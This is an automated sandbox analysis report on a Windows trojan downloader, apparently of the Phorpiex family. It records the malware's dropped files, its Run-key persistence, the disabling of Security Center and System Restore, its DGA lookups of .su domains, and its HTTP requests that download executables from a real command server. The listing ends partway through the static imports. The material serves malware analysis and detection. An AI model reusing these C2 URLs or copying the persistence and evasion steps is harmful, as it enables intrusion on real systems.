Exes_606ac88c_1.json

  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Exes_606ac88c.1"
  7. [*] File Size: 253440
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "f06bc76647c37e85b60aec384eba21a56a3dc2ddb0b962536b05f1b827fee8b1"
  10. [*] MD5: "230ad5935436cf709dc1e06a6229c3b3"
  11. [*] SHA1: "0c4a87cbdd0cb833e574d7ddec41b59b83b3d554"
  12. [*] SHA512: "5d5ba9ad69f093475fddb2cefe365d86267d8eacb402e0ac3e6180cf96722f6a5938caa9fec79064ddce452b01838b730ea2b65d23f10e2209d6f26c92a3775e"
  13. [*] CRC32: "606AC88C"
  14. [*] SSDEEP: "6144:vR40u42cHaIKQ0xNuaDD4b7OeHMDzCTf:vRs5c6JxNuoTCT"
  15.  
  16. [*] Process Execution: [
  17. "Exes_606ac88c.1",
  18. "winnjdu.exe",
  19. "1103737371.exe",
  20. "3251136198.exe",
  21. "wingzfw.exe",
  22. "2451410298.exe",
  23. "2940639086.exe",
  24. "4227421410.exe"
  25. ]
  26.  
  27. [*] Signatures Detected: [
  28. {
  29. "Description": "Creates RWX memory",
  30. "Details": []
  31. },
  32. {
  33. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
  34. "Details": []
  35. },
  36. {
  37. "Description": "Drops a binary and executes it",
  38. "Details": [
  39. {
  40. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
  41. },
  42. {
  43. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
  44. },
  45. {
  46. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe"
  47. },
  48. {
  49. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe"
  50. },
  51. {
  52. "binary": "C:\\Windows\\2018222015062149\\winnjdu.exe"
  53. },
  54. {
  55. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
  56. },
  57. {
  58. "binary": "C:\\Windows\\3007640516827661\\wingzfw.exe"
  59. }
  60. ]
  61. },
  62. {
  63. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  64. "Details": [
  65. {
  66. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  67. },
  68. {
  69. "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
  70. },
  71. {
  72. "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
  73. },
  74. {
  75. "suspicious_request": "http://193.32.161.77/1.exe"
  76. },
  77. {
  78. "suspicious_request": "http://193.32.161.77/2.exe"
  79. },
  80. {
  81. "suspicious_request": "http://193.32.161.77/3.exe"
  82. },
  83. {
  84. "suspicious_request": "http://193.32.161.77/4.exe"
  85. },
  86. {
  87. "suspicious_request": "http://193.32.161.77/5.exe"
  88. }
  89. ]
  90. },
  91. {
  92. "Description": "Performs some HTTP requests",
  93. "Details": [
  94. {
  95. "url": "http://193.32.161.77/tldr.php?new=1"
  96. },
  97. {
  98. "url": "http://193.32.161.77/tldr.php?on=1"
  99. },
  100. {
  101. "url": "http://193.32.161.77/1.exe"
  102. },
  103. {
  104. "url": "http://193.32.161.77/2.exe"
  105. },
  106. {
  107. "url": "http://193.32.161.77/3.exe"
  108. },
  109. {
  110. "url": "http://193.32.161.77/4.exe"
  111. },
  112. {
  113. "url": "http://193.32.161.77/5.exe"
  114. }
  115. ]
  116. },
  117. {
  118. "Description": "Detects Sandboxie through the presence of a library",
  119. "Details": []
  120. },
  121. {
  122. "Description": "Detects SunBelt Sandbox through the presence of a library",
  123. "Details": []
  124. },
  125. {
  126. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
  127. "Details": [
  128. {
  129. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier"
  130. }
  131. ]
  132. },
  133. {
  134. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  135. "Details": [
  136. {
  137. "Spam": "3251136198.exe (1720) called API GlobalMemoryStatus 2165386 times"
  138. },
  139. {
  140. "Spam": "4227421410.exe (2972) called API GlobalMemoryStatus 574213 times"
  141. },
  142. {
  143. "Spam": "wingzfw.exe (596) called API GlobalMemoryStatus 2165386 times"
  144. }
  145. ]
  146. },
  147. {
  148. "Description": "Installs itself for autorun at Windows startup",
  149. "Details": [
  150. {
  151. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
  152. },
  153. {
  154. "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
  155. },
  156. {
  157. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
  158. },
  159. {
  160. "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
  161. }
  162. ]
  163. },
  164. {
  165. "Description": "Creates a hidden or system file",
  166. "Details": [
  167. {
  168. "file": "C:\\Windows\\2018222015062149"
  169. },
  170. {
  171. "file": "C:\\Windows\\2018222015062149\\winnjdu.exe"
  172. },
  173. {
  174. "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
  175. }
  176. ]
  177. },
  178. {
  179. "Description": "File has been identified by 43 Antiviruses on VirusTotal as malicious",
  180. "Details": [
  181. {
  182. "MicroWorld-eScan": "Trojan.GenericKD.32053517"
  183. },
  184. {
  185. "FireEye": "Generic.mg.230ad5935436cf70"
  186. },
  187. {
  188. "McAfee": "Trojan-FQYR!230AD5935436"
  189. },
  190. {
  191. "Cylance": "Unsafe"
  192. },
  193. {
  194. "AegisLab": "Trojan.Win32.Trik.4!c"
  195. },
  196. {
  197. "Alibaba": "TrojanDownloader:Win32/Trik.46992fc6"
  198. },
  199. {
  200. "K7GW": "Riskware ( 0040eff71 )"
  201. },
  202. {
  203. "Symantec": "Trojan.Gen.2"
  204. },
  205. {
  206. "APEX": "Malicious"
  207. },
  208. {
  209. "Paloalto": "generic.ml"
  210. },
  211. {
  212. "Kaspersky": "Trojan-Downloader.Win32.Trik.fo"
  213. },
  214. {
  215. "BitDefender": "Trojan.GenericKD.32053517"
  216. },
  217. {
  218. "Avast": "Win32:CrypterX-gen [Trj]"
  219. },
  220. {
  221. "Rising": "Worm.Phorpiex!8.48D (CLOUD)"
  222. },
  223. {
  224. "Endgame": "malicious (moderate confidence)"
  225. },
  226. {
  227. "Sophos": "Mal/Generic-S"
  228. },
  229. {
  230. "Comodo": "Malware@#4velj06b5762"
  231. },
  232. {
  233. "F-Secure": "Trojan.TR/AD.Phorpiex.uirrr"
  234. },
  235. {
  236. "TrendMicro": "TROJ_GEN.R011C0GFD19"
  237. },
  238. {
  239. "McAfee-GW-Edition": "BehavesLike.Win32.MultiPlug.dh"
  240. },
  241. {
  242. "Trapmine": "malicious.high.ml.score"
  243. },
  244. {
  245. "Emsisoft": "Trojan.GenericKD.32053517 (B)"
  246. },
  247. {
  248. "SentinelOne": "DFI - Suspicious PE"
  249. },
  250. {
  251. "Cyren": "W32/Trojan.MOZI-2355"
  252. },
  253. {
  254. "ESET-NOD32": "a variant of Win32/Kryptik.GTXN"
  255. },
  256. {
  257. "Webroot": "W32.Trojan.Gen"
  258. },
  259. {
  260. "Avira": "TR/AD.Phorpiex.uirrr"
  261. },
  262. {
  263. "Fortinet": "W32/Kryptik.GTVG!tr"
  264. },
  265. {
  266. "Microsoft": "Worm:Win32/Phorpiex.AF!bit"
  267. },
  268. {
  269. "Arcabit": "Trojan.Generic.D1E9190D"
  270. },
  271. {
  272. "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fo"
  273. },
  274. {
  275. "GData": "Trojan.GenericKD.32053517"
  276. },
  277. {
  278. "AhnLab-V3": "Malware/Win32.Generic.C3288358"
  279. },
  280. {
  281. "Acronis": "suspicious"
  282. },
  283. {
  284. "ALYac": "Trojan.GenericKD.32053517"
  285. },
  286. {
  287. "VBA32": "BScope.Trojan.AET.281105"
  288. },
  289. {
  290. "Malwarebytes": "Trojan.MalPack.GS"
  291. },
  292. {
  293. "TrendMicro-HouseCall": "TROJ_GEN.R011C0GFD19"
  294. },
  295. {
  296. "Ikarus": "Trojan.Win32.Krypt"
  297. },
  298. {
  299. "Ad-Aware": "Trojan.GenericKD.32053517"
  300. },
  301. {
  302. "AVG": "Win32:CrypterX-gen [Trj]"
  303. },
  304. {
  305. "Panda": "Trj/GdSda.A"
  306. },
  307. {
  308. "CrowdStrike": "win/malicious_confidence_70% (W)"
  309. }
  310. ]
  311. },
  312. {
  313. "Description": "Operates on local firewall's policies and settings",
  314. "Details": []
  315. },
  316. {
  317. "Description": "Creates a copy of itself",
  318. "Details": [
  319. {
  320. "copy": "C:\\Windows\\2018222015062149\\winnjdu.exe"
  321. },
  322. {
  323. "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
  324. }
  325. ]
  326. },
  327. {
  328. "Description": "Attempts to disable System Restore",
  329. "Details": []
  330. },
  331. {
  332. "Description": "Attempts to modify or disable Security Center warnings",
  333. "Details": []
  334. },
  335. {
  336. "Description": "Likely use of Domain Generation Algorithm (DGA)",
  337. "Details": []
  338. },
  339. {
  340. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
  341. "Details": [
  342. {
  343. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier"
  344. },
  345. {
  346. "file": "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier"
  347. }
  348. ]
  349. },
  350. {
  351. "Description": "Anomalous binary characteristics",
  352. "Details": [
  353. {
  354. "anomaly": "Found duplicated section names"
  355. }
  356. ]
  357. },
  358. {
  359. "Description": "Created network traffic indicative of malicious activity",
  360. "Details": [
  361. {
  362. "signature": "ET DROP Dshield Block Listed Source group 1"
  363. },
  364. {
  365. "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
  366. },
  367. {
  368. "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
  369. }
  370. ]
  371. }
  372. ]
  373.  
  374. [*] Started Service: []
  375.  
  376. [*] Executed Commands: [
  377. "C:\\Windows\\2018222015062149\\winnjdu.exe",
  378. "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
  379. "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
  380. "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
  381. ]
  382.  
  383. [*] Mutexes: [
  384. "976857468"
  385. ]
  386.  
  387. [*] Modified Files: [
  388. "C:\\Windows\\2018222015062149\\winnjdu.exe",
  389. "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
  390. "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
  391. "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
  392. "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe",
  393. "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe",
  394. "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
  395. ]
  396.  
  397. [*] Deleted Files: [
  398. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier",
  399. "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier",
  400. "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier",
  401. "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe:Zone.Identifier",
  402. "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe:Zone.Identifier",
  403. "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe:Zone.Identifier"
  404. ]
  405.  
  406. [*] Modified Registry Keys: [
  407. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
  408. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
  409. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
  410. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
  411. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
  412. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
  413. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
  414. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
  415. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
  416. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
  417. ]
  418.  
  419. [*] Deleted Registry Keys: []
  420.  
  421. [*] DNS Communications: [
  422. {
  423. "type": "A",
  424. "request": "aiheiufisd.su",
  425. "answers": [
  426. {
  427. "data": "",
  428. "type": "NXDOMAIN"
  429. }
  430. ]
  431. },
  432. {
  433. "type": "A",
  434. "request": "aeoghehofu.su",
  435. "answers": [
  436. {
  437. "data": "",
  438. "type": "NXDOMAIN"
  439. }
  440. ]
  441. },
  442. {
  443. "type": "A",
  444. "request": "aniaeninie.su",
  445. "answers": [
  446. {
  447. "data": "",
  448. "type": "NXDOMAIN"
  449. }
  450. ]
  451. },
  452. {
  453. "type": "A",
  454. "request": "aiaeufaehe.su",
  455. "answers": [
  456. {
  457. "data": "",
  458. "type": "NXDOMAIN"
  459. }
  460. ]
  461. },
  462. {
  463. "type": "A",
  464. "request": "aieieieros.su",
  465. "answers": [
  466. {
  467. "data": "",
  468. "type": "NXDOMAIN"
  469. }
  470. ]
  471. },
  472. {
  473. "type": "A",
  474. "request": "abaeubuegs.su",
  475. "answers": [
  476. {
  477. "data": "",
  478. "type": "NXDOMAIN"
  479. }
  480. ]
  481. },
  482. {
  483. "type": "A",
  484. "request": "aeubeufubg.su",
  485. "answers": [
  486. {
  487. "data": "",
  488. "type": "NXDOMAIN"
  489. }
  490. ]
  491. },
  492. {
  493. "type": "A",
  494. "request": "aeuaueudgs.su",
  495. "answers": [
  496. {
  497. "data": "",
  498. "type": "NXDOMAIN"
  499. }
  500. ]
  501. },
  502. {
  503. "type": "A",
  504. "request": "xiheiufisd.su",
  505. "answers": [
  506. {
  507. "data": "",
  508. "type": "NXDOMAIN"
  509. }
  510. ]
  511. },
  512. {
  513. "type": "A",
  514. "request": "xeoghehofu.su",
  515. "answers": [
  516. {
  517. "data": "",
  518. "type": "NXDOMAIN"
  519. }
  520. ]
  521. },
  522. {
  523. "type": "A",
  524. "request": "xniaeninie.su",
  525. "answers": [
  526. {
  527. "data": "",
  528. "type": "NXDOMAIN"
  529. }
  530. ]
  531. },
  532. {
  533. "type": "A",
  534. "request": "xiaeufaehe.su",
  535. "answers": [
  536. {
  537. "data": "",
  538. "type": "NXDOMAIN"
  539. }
  540. ]
  541. },
  542. {
  543. "type": "A",
  544. "request": "xieieieros.su",
  545. "answers": [
  546. {
  547. "data": "",
  548. "type": "NXDOMAIN"
  549. }
  550. ]
  551. },
  552. {
  553. "type": "A",
  554. "request": "xbaeubuegs.su",
  555. "answers": [
  556. {
  557. "data": "",
  558. "type": "NXDOMAIN"
  559. }
  560. ]
  561. },
  562. {
  563. "type": "A",
  564. "request": "teubeufubg.su",
  565. "answers": [
  566. {
  567. "data": "",
  568. "type": "NXDOMAIN"
  569. }
  570. ]
  571. },
  572. {
  573. "type": "A",
  574. "request": "teuaueudgs.su",
  575. "answers": [
  576. {
  577. "data": "",
  578. "type": "NXDOMAIN"
  579. }
  580. ]
  581. },
  582. {
  583. "type": "A",
  584. "request": "tiheiufisd.su",
  585. "answers": [
  586. {
  587. "data": "",
  588. "type": "NXDOMAIN"
  589. }
  590. ]
  591. },
  592. {
  593. "type": "A",
  594. "request": "teoghehofu.su",
  595. "answers": [
  596. {
  597. "data": "",
  598. "type": "NXDOMAIN"
  599. }
  600. ]
  601. },
  602. {
  603. "type": "A",
  604. "request": "tniaeninie.su",
  605. "answers": [
  606. {
  607. "data": "",
  608. "type": "NXDOMAIN"
  609. }
  610. ]
  611. },
  612. {
  613. "type": "A",
  614. "request": "tiaeufaehe.su",
  615. "answers": [
  616. {
  617. "data": "",
  618. "type": "NXDOMAIN"
  619. }
  620. ]
  621. },
  622. {
  623. "type": "A",
  624. "request": "tieieieros.su",
  625. "answers": [
  626. {
  627. "data": "",
  628. "type": "NXDOMAIN"
  629. }
  630. ]
  631. },
  632. {
  633. "type": "A",
  634. "request": "tbaeubuegs.su",
  635. "answers": [
  636. {
  637. "data": "",
  638. "type": "NXDOMAIN"
  639. }
  640. ]
  641. },
  642. {
  643. "type": "A",
  644. "request": "wiheiufisd.su",
  645. "answers": [
  646. {
  647. "data": "",
  648. "type": "NXDOMAIN"
  649. }
  650. ]
  651. },
  652. {
  653. "type": "A",
  654. "request": "weoghehofu.su",
  655. "answers": [
  656. {
  657. "data": "",
  658. "type": "NXDOMAIN"
  659. }
  660. ]
  661. },
  662. {
  663. "type": "A",
  664. "request": "wniaeninie.su",
  665. "answers": [
  666. {
  667. "data": "",
  668. "type": "NXDOMAIN"
  669. }
  670. ]
  671. },
  672. {
  673. "type": "A",
  674. "request": "wiaeufaehe.su",
  675. "answers": [
  676. {
  677. "data": "",
  678. "type": "NXDOMAIN"
  679. }
  680. ]
  681. },
  682. {
  683. "type": "A",
  684. "request": "wieieieros.su",
  685. "answers": [
  686. {
  687. "data": "",
  688. "type": "NXDOMAIN"
  689. }
  690. ]
  691. },
  692. {
  693. "type": "A",
  694. "request": "wbaeubuegs.su",
  695. "answers": [
  696. {
  697. "data": "",
  698. "type": "NXDOMAIN"
  699. }
  700. ]
  701. },
  702. {
  703. "type": "A",
  704. "request": "weubeufubg.su",
  705. "answers": [
  706. {
  707. "data": "",
  708. "type": "NXDOMAIN"
  709. }
  710. ]
  711. },
  712. {
  713. "type": "A",
  714. "request": "weuaueudgs.su",
  715. "answers": [
  716. {
  717. "data": "",
  718. "type": "NXDOMAIN"
  719. }
  720. ]
  721. },
  722. {
  723. "type": "MX",
  724. "request": "yahoo.com",
  725. "answers": [
  726. {
  727. "data": "mta5.am0.yahoodns.net",
  728. "type": "MX"
  729. },
  730. {
  731. "data": "mta7.am0.yahoodns.net",
  732. "type": "MX"
  733. },
  734. {
  735. "data": "mta6.am0.yahoodns.net",
  736. "type": "MX"
  737. }
  738. ]
  739. },
  740. {
  741. "type": "A",
  742. "request": "mta6.am0.yahoodns.net",
  743. "answers": [
  744. {
  745. "data": "67.195.228.94",
  746. "type": "A"
  747. },
  748. {
  749. "data": "66.218.85.139",
  750. "type": "A"
  751. },
  752. {
  753. "data": "74.6.137.64",
  754. "type": "A"
  755. },
  756. {
  757. "data": "98.137.159.27",
  758. "type": "A"
  759. },
  760. {
  761. "data": "98.137.159.26",
  762. "type": "A"
  763. },
  764. {
  765. "data": "98.137.159.25",
  766. "type": "A"
  767. },
  768. {
  769. "data": "66.218.85.52",
  770. "type": "A"
  771. },
  772. {
  773. "data": "67.195.228.110",
  774. "type": "A"
  775. }
  776. ]
  777. }
  778. ]
  779.  
  780. [*] Domains: [
  781. {
  782. "ip": "92.242.140.2",
  783. "domain": "xiaeufaehe.su"
  784. },
  785. {
  786. "ip": "92.242.140.2",
  787. "domain": "tiaeufaehe.su"
  788. },
  789. {
  790. "ip": "92.242.140.2",
  791. "domain": "aieieieros.su"
  792. },
  793. {
  794. "ip": "92.242.140.2",
  795. "domain": "teuaueudgs.su"
  796. },
  797. {
  798. "ip": "92.242.140.2",
  799. "domain": "aniaeninie.su"
  800. },
  801. {
  802. "ip": "92.242.140.2",
  803. "domain": "weubeufubg.su"
  804. },
  805. {
  806. "ip": "92.242.140.2",
  807. "domain": "wbaeubuegs.su"
  808. },
  809. {
  810. "ip": "92.242.140.2",
  811. "domain": "wieieieros.su"
  812. },
  813. {
  814. "ip": "92.242.140.2",
  815. "domain": "wiaeufaehe.su"
  816. },
  817. {
  818. "ip": "92.242.140.2",
  819. "domain": "wiheiufisd.su"
  820. },
  821. {
  822. "ip": "92.242.140.2",
  823. "domain": "teoghehofu.su"
  824. },
  825. {
  826. "ip": "92.242.140.2",
  827. "domain": "aeoghehofu.su"
  828. },
  829. {
  830. "ip": "92.242.140.2",
  831. "domain": "wniaeninie.su"
  832. },
  833. {
  834. "ip": "92.242.140.2",
  835. "domain": "aiheiufisd.su"
  836. },
  837. {
  838. "ip": "92.242.140.2",
  839. "domain": "xiheiufisd.su"
  840. },
  841. {
  842. "ip": "92.242.140.2",
  843. "domain": "tniaeninie.su"
  844. },
  845. {
  846. "ip": "74.6.137.64",
  847. "domain": "mta6.am0.yahoodns.net"
  848. },
  849. {
  850. "ip": "92.242.140.2",
  851. "domain": "xieieieros.su"
  852. },
  853. {
  854. "ip": "92.242.140.2",
  855. "domain": "tbaeubuegs.su"
  856. },
  857. {
  858. "ip": "92.242.140.2",
  859. "domain": "aiaeufaehe.su"
  860. },
  861. {
  862. "ip": "92.242.140.2",
  863. "domain": "weoghehofu.su"
  864. },
  865. {
  866. "ip": "92.242.140.2",
  867. "domain": "xeoghehofu.su"
  868. },
  869. {
  870. "ip": "92.242.140.2",
  871. "domain": "abaeubuegs.su"
  872. },
  873. {
  874. "ip": "92.242.140.2",
  875. "domain": "xbaeubuegs.su"
  876. },
  877. {
  878. "ip": "72.30.35.10",
  879. "domain": "yahoo.com"
  880. },
  881. {
  882. "ip": "92.242.140.2",
  883. "domain": "tieieieros.su"
  884. },
  885. {
  886. "ip": "92.242.140.2",
  887. "domain": "aeubeufubg.su"
  888. },
  889. {
  890. "ip": "92.242.140.2",
  891. "domain": "aeuaueudgs.su"
  892. },
  893. {
  894. "ip": "92.242.140.2",
  895. "domain": "teubeufubg.su"
  896. },
  897. {
  898. "ip": "92.242.140.2",
  899. "domain": "xniaeninie.su"
  900. },
  901. {
  902. "ip": "92.242.140.2",
  903. "domain": "tiheiufisd.su"
  904. },
  905. {
  906. "ip": "92.242.140.2",
  907. "domain": "weuaueudgs.su"
  908. }
  909. ]
  910.  
  911. [*] Network Communication - ICMP: []
  912.  
  913. [*] Network Communication - HTTP: [
  914. {
  915. "count": 1,
  916. "body": "",
  917. "uri": "http://193.32.161.77/tldr.php?new=1",
  918. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  919. "method": "GET",
  920. "host": "193.32.161.77",
  921. "version": "1.1",
  922. "path": "/tldr.php?new=1",
  923. "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  924. "port": 80
  925. },
  926. {
  927. "count": 1,
  928. "body": "",
  929. "uri": "http://193.32.161.77/tldr.php?on=1",
  930. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  931. "method": "GET",
  932. "host": "193.32.161.77",
  933. "version": "1.1",
  934. "path": "/tldr.php?on=1",
  935. "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  936. "port": 80
  937. },
  938. {
  939. "count": 2,
  940. "body": "",
  941. "uri": "http://193.32.161.77/1.exe",
  942. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  943. "method": "GET",
  944. "host": "193.32.161.77",
  945. "version": "1.1",
  946. "path": "/1.exe",
  947. "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  948. "port": 80
  949. },
  950. {
  951. "count": 2,
  952. "body": "",
  953. "uri": "http://193.32.161.77/2.exe",
  954. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  955. "method": "GET",
  956. "host": "193.32.161.77",
  957. "version": "1.1",
  958. "path": "/2.exe",
  959. "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  960. "port": 80
  961. },
  962. {
  963. "count": 2,
  964. "body": "",
  965. "uri": "http://193.32.161.77/3.exe",
  966. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  967. "method": "GET",
  968. "host": "193.32.161.77",
  969. "version": "1.1",
  970. "path": "/3.exe",
  971. "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  972. "port": 80
  973. },
  974. {
  975. "count": 2,
  976. "body": "",
  977. "uri": "http://193.32.161.77/4.exe",
  978. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  979. "method": "GET",
  980. "host": "193.32.161.77",
  981. "version": "1.1",
  982. "path": "/4.exe",
  983. "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  984. "port": 80
  985. },
  986. {
  987. "count": 2,
  988. "body": "",
  989. "uri": "http://193.32.161.77/5.exe",
  990. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  991. "method": "GET",
  992. "host": "193.32.161.77",
  993. "version": "1.1",
  994. "path": "/5.exe",
  995. "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  996. "port": 80
  997. }
  998. ]
  999.  
  1000. [*] Network Communication - SMTP: []
  1001.  
  1002. [*] Network Communication - Hosts: []
  1003.  
  1004. [*] Network Communication - IRC: []
  1005.  
  1006. [*] Static Analysis: {
  1007. "pe": {
  1008. "peid_signatures": null,
  1009. "imports": [
  1010. {
  1011. "imports": [
  1012. {
  1013. "name": "ExitProcess",
  1014. "address": "0x426000"
  1015. },
  1016. {
  1017. "name": "DebugActiveProcessStop",
  1018. "address": "0x426004"
  1019. },
  1020. {
  1021. "name": "lstrcpynA",
  1022. "address": "0x426008"
  1023. },
  1024. {
  1025. "name": "UnlockFile",
  1026. "address": "0x42600c"
  1027. },
  1028. {
  1029. "name": "GetFileAttributesExA",
  1030. "address": "0x426010"
  1031. },
  1032. {
  1033. "name": "GetTickCount",
  1034. "address": "0x426014"
  1035. },
  1036. {
  1037. "name": "GetNumberFormatA",
  1038. "address": "0x426018"
  1039. },
  1040. {
  1041. "name": "GlobalAlloc",
  1042. "address": "0x42601c"
  1043. },
  1044. {
  1045. "name": "LoadLibraryW",
  1046. "address": "0x426020"
  1047. },
  1048. {
  1049. "name": "GetConsoleAliasExesLengthW",
  1050. "address": "0x426024"
  1051. },
  1052. {
  1053. "name": "GetBinaryTypeA",
  1054. "address": "0x426028"
  1055. },
  1056. {
  1057. "name": "lstrlenW",
  1058. "address": "0x42602c"
  1059. },
  1060. {
  1061. "name": "Module32First",
  1062. "address": "0x426030"
  1063. },
  1064. {
  1065. "name": "GetLastError",
  1066. "address": "0x426034"
  1067. },
  1068. {
  1069. "name": "GetProcAddress",
  1070. "address": "0x426038"
  1071. },
  1072. {
  1073. "name": "PeekConsoleInputW",
  1074. "address": "0x42603c"
  1075. },
  1076. {
  1077. "name": "WTSGetActiveConsoleSessionId",
  1078. "address": "0x426040"
  1079. },
  1080. {
  1081. "name": "VirtualProtect",
  1082. "address": "0x426044"
  1083. },
  1084. {
  1085. "name": "CreateToolhelp32Snapshot",
  1086. "address": "0x426048"
  1087. },
  1088. {
  1089. "name": "GetCPInfoExA",
  1090. "address": "0x42604c"
  1091. },
  1092. {
  1093. "name": "CloseHandle",
  1094. "address": "0x426050"
  1095. },
  1096. {
  1097. "name": "EncodePointer",
  1098. "address": "0x426054"
  1099. },
  1100. {
  1101. "name": "DecodePointer",
  1102. "address": "0x426058"
  1103. },
  1104. {
  1105. "name": "GetCommandLineA",
  1106. "address": "0x42605c"
  1107. },
  1108. {
  1109. "name": "RaiseException",
  1110. "address": "0x426060"
  1111. },
  1112. {
  1113. "name": "RtlUnwind",
  1114. "address": "0x426064"
  1115. },
  1116. {
  1117. "name": "IsDebuggerPresent",
  1118. "address": "0x426068"
  1119. },
  1120. {
  1121. "name": "IsProcessorFeaturePresent",
  1122. "address": "0x42606c"
  1123. },
  1124. {
  1125. "name": "EnterCriticalSection",
  1126. "address": "0x426070"
  1127. },
  1128. {
  1129. "name": "LeaveCriticalSection",
  1130. "address": "0x426074"
  1131. },
  1132. {
